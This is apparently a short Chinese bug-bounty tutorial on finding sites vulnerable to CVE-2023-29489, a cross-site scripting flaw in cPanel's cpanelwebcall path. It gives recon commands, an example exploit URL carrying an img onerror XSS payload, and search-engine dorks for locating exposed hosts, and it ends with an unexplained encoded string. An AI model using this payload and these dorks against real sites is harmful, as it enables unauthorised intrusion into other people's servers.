追踪 CVE-2023-29489:揭秘Web漏洞狩猎技巧与潜在蜜罐风险

45 阅读1分钟

为什么追踪 2023、2024 年的 CVE,而不是最新的 2025 年?

因为最新的 CVE 通常不被接受,大多数情况下只接受 5-6 个月以前的 CVE(特殊情况除外)。而且,并非所有 CVE 始终都是可利用的‼️

1️⃣ Waymore Grep

waymore -i domain.com -mode U -oU waymore_domain.txt
cat waymore_domain.txt | grep -i "cpanelwebcall" | sort -u | uro

https://domain[.]com/cpanelwebcall/insert_xss_payload_here/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">

noobhacker

2️⃣ Google Dork

inurl:cpanelwebcall

3️⃣ Shodan Dork

http.title:"cPanel"

我们可以使用网站图标哈希找到更多结果。

寻找隐藏资产 — 深度侦察

漏洞猎人的网站图标侦察

cybersecuritywriteups.com

4️⃣ Fofa Dork 直接尝试匹配这个字符串:

"cpanelwebcall"

CSD0tFqvECLokhw9aBeRqgdmZ7Kc5W3etiYWLowSc03qyoGlUEJvQLtYYOT4kHlKMR/9STAzzAH7w3HlCxdhgKB52xHiitxzyoe29+8wGi10+TXVAT+SxLivtpAnVHVM